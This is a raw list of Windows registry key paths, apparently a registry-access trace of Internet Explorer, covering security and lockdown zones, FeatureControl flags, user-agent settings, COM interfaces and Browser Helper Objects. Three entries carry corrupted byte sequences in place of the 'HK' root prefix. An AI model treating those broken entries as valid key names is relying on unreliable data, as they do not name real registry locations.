HKEY_CURRENT_USER\Software\Classes\CLSID\{D5E8041D-920F-45E9-B8FB-B1DEB82C6E5E}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D5E8041D-920F-45E9-B8FB-B1DEB82C6E5E}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D5E8041D-920F-45E9-B8FB-B1DEB82C6E5E}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D5E8041D-920F-45E9-B8FB-B1DEB82C6E5E}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D5E8041D-920F-45E9-B8FB-B1DEB82C6E5E}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D5E8041D-920F-45E9-B8FB-B1DEB82C6E5E}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D5E8041D-920F-45E9-B8FB-B1DEB82C6E5E}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D5E8041D-920F-45E9-B8FB-B1DEB82C6E5E}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Url History
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Url History
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Url History
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Url History
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Url History\DaysToKeep
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameTabWindow
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FrameTabWindow
HKEY_CURRENT_USER\Software\Classes\Interface\{9EC704BA-E1D4-45C5-9B59-BFAE07D9F04E}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9EC704BA-E1D4-45C5-9B59-BFAE07D9F04E}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9EC704BA-E1D4-45C5-9B59-BFAE07D9F04E}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{B40C43F1-F039-44D2-AEB7-87F5AF8ABC3D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{B40C43F1-F039-44D2-AEB7-87F5AF8ABC3D}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{B40C43F1-F039-44D2-AEB7-87F5AF8ABC3D}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{D358F4E1-0465-4965-9DD5-CAE303D2C345}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D358F4E1-0465-4965-9DD5-CAE303D2C345}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D358F4E1-0465-4965-9DD5-CAE303D2C345}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{F704B7E0-4760-46FF-BBDB-7439E0A2A814}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{F704B7E0-4760-46FF-BBDB-7439E0A2A814}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{F704B7E0-4760-46FF-BBDB-7439E0A2A814}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links\Order
\xe7\x9d\xa0\xc3\xa1EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links\Order
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0\DisplayName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0\DisplayMask
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0\Expiration
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LinksBar\ItemCache\0\ErrorState
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE\DontUseDesktopChangeRouter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Marlett
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\SecurityService
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService\DefaultAuthLevel
HKEY_CURRENT_USER\Software\Classes\Interface\{00020400-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00020400-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00020400-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020420-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\iexplore.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldDllVersionLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldDllVersionHigh
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldVersionLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldVersionHigh
HKEY_LOCAL_MACHINE\Software\Microsoft\Feeds
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Feeds\UrlCacheVersion
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\iexplore.exe
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\http\
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\*\
HKEY_LOCAL_MACHINE\Software\Microsoft\Ole
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaximumAllowedAllocationSize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\Feature_Enable_Compat_Logging
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\Feature_Enable_Compat_Logging
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\UA Tokens
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
\xe1\x84\x90\xc2\x97EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Pre Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Pre Platform
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Pre Platform
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\iexplore.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\iexplore.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\*
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\UrlMon Settings
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_POLICIES_ZONEMAP_IF_ESC_ENABLED_KB918915
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_IGNORE_POLICIES_ZONEMAP_IF_ESC_ENABLED_KB918915
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_UNC_SAVEDFILECHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_UNC_SAVEDFILECHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_UNC_SAVEDFILECHECK\iexplore.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_UNC_SAVEDFILECHECK\*
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\iexplore.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\iexplore.exe
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableUTF8
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AcceptLanguage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\AllSitesCompatibilityMode
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\BrowserEmulation
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\IntranetCompatibilityMode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\MSCompatibilityMode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\UnattendLoaded
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_LEGACY_COMPRESSION
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_LEGACY_COMPRESSION
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_LEGACY_COMPRESSION\iexplore.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_LEGACY_COMPRESSION\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\StatusBarWeb
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\StatusBarWeb
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Enable Browser Extensions
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Toolbar
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoBandCustomize
HKEY_CURRENT_USER\Software\AppDataLow
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\InternetRegistry
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Passport\LowDAMap
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\LowRegistry
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Zoom
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\LowMic
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\ITBar7Layout
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\ITBarLayout
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\AlwaysShowMenus
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\AlwaysShowMenus
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink\SystemLink
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\DataFilePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane1
\xef\xae\x80\xc3\x95EY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane11
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane12
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane13
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane14
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane15
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane16
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Segoe UI
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ADDON_MANAGEMENT
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\Flags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{18df081c-e8ad-4283-a596-fa578c2ebdc3}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\InprocServer32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\AcroIEHelperShim.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}
